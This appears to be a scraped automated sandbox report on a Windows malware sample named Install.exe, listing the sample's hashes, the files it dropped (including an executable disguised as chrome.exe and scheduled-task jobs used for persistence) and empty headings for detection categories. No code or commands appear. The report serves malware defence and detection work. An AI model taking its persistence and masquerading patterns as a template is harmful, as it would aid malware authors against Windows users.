Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	597646
Product:	CloudBasic
Start time:	01:39:51
Start date:	27.03.2022
Sample:	Install.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	280bfd5ea1f41586ea0ef60ee44bc8db
SHA1:	57aa866f42bccbaceed938390001148323d033c1
SHA256:	a6ca5523fce6a4a43964319c35ecb868186465309e9226ab07c158519a5ef6f9
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\34432.exe.log	ASCII text, with CRLF line terminators	06639220FD6B2DCCDA25EAE889B6BCC8	3EDFCBE94838702A978D3D518B2358560A296FD0	32F1B0CAE8509079F3F044C5655800CD760DB66E792B451DF2C919B6129DCB83
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	DA4B150893016C59B1E5DE988406A425	9CAF9C1A8F844A0FA8D88DC30F29BE7B023E7079	5107772D1007FD535B026DF52ADF8864E7C2D4C1ACAB3CD03A5C112517A426DF
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	12513EC7250BFC953C71EA941E82B42C	F821E6EF80B3144841A0385A593C2605978BAD45	91249CB24DDFEB9DC31A3EACB04449E3422C6EB754265D23C897A413EFB62592
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bm0fgaxm.amy.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngejssxk.m2l.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oy0x04mz.n4f.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sm1ft0n0.g32.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u32chnre.idy.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vv5vdss4.ljn.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xll1yvfj.55e.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yezoz5fn.st5.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Roaming\34432.exe	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows	04F6704BD3AB97905A497BAF3D7FDB3C	7D216C427AF6199D119B1C5A0CC93BDB724AF669	39630AAF0E17AA1929B5CF2F4340C22F22FA6F8F6D76F8398C288BFF972B95FA
C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	PE32 executable (console) Intel 80386, for MS Windows	D55DC38B4EE6BED2168E74194533C572	431F6F9AEB280102E8764A5184CABE6CC98052CA	4B283EC8E073FB61BBB612A152EB332A5C92E7473CF6584A8B716FD87684A936
C:\Users\user\AppData\Roaming\Chrome\chrome.exe	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows	04F6704BD3AB97905A497BAF3D7FDB3C	7D216C427AF6199D119B1C5A0CC93BDB724AF669	39630AAF0E17AA1929B5CF2F4340C22F22FA6F8F6D76F8398C288BFF972B95FA
C:\Users\user\Documents\20220327\PowerShell_transcript.562258.JE93yUZc.20220327014216.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	65537AD9317CD9A794FF2C8A25E3A7F8	99CFC1994EEDC8F868B1245E655587DB41F269DF	5F7D9A86D2E3083645825298C5A61B2EB54DA2F2DA13241ECA4602C03766123F
C:\Users\user\Documents\20220327\PowerShell_transcript.562258.mru0uP4T.20220327014103.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	3B10DF410A30476A570541A74E966B4E	8834897CC7C20AD5C4C4B59A91B5535FB94B454A	4D3D10EC15EB5EB0E10AF8753F72EACE24DC29BA1D9B1638A7B1DD29C2EF8BC9
C:\Users\user\Documents\20220327\PowerShell_transcript.562258.nmfYJOoe.20220327014128.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	7E8115E31EC613777C6FDFF8F88B6CF2	253DBF54E6B578E26E71DC64D505DE9F62630062	4045DB0535FC2EF934E014E0C773D7E43CA50B077ED8536979F8CED459F1B608
C:\Windows\System32\20220327\PowerShell_transcript.562258.muxVAL9A.20220327014144.txt	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	4D218FEB27E8E5EDB4F59D0922AA32A2	DF06E9EDE255262EF358472D0C2A9B2FA306664D	5E36C2D39F94189CCAD4AEE28C26042A699ACEE5BB8E3C23ACA4C9BF9F16D853
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	ADFF5BE0A9BB797ADEDC0B16C501A155	ED842BE69739E3BF9082DE8FB0F7A596C22C0345	DADBB3611E60443C1F96672B3950A32B915D115EAA6FE8F6D8A57BED4067E3B0
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	C89140BEA721DEBDA4F741B52939612A	A353FE9D71C211A24EE7208F45CCC71170A65CD4	05E8082DAD4310F294CF069474C1DFA784427D69E87229D750FDA87C46B2D0B4
C:\Windows\Tasks\nslooksvc32.job	data	D6D553675A7B8F75130BDD8C7E3B7A7D	EC8FE28936E9C0010B55180AD5A34439D1919EE3	523EAA769500D372D8DA8A2D77004F7F696865A174BB809B359792067822BE39
C:\Windows\Tasks\nslooksvc64.job	data	8743521E80CA300CB5D64D9129AC9B32	02EC0C200E3CE2F12CA6EFAC516CFC0E72DA5AA2	B71335A7AF988047E29D0BDCE479EE8DD32351F03DE0A73D53D7D5C68E82A1F9
C:\Windows\Temp\__PSScriptPolicyTest_0aljq3hk.ty5.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Windows\Temp\__PSScriptPolicyTest_jbeqyhc4.p5f.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Windows\Temp\__PSScriptPolicyTest_oz5sx3tu.kvs.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Windows\Temp\__PSScriptPolicyTest_sxsipg5c.ym2.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B

Windows Analysis Report Install.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Install.exe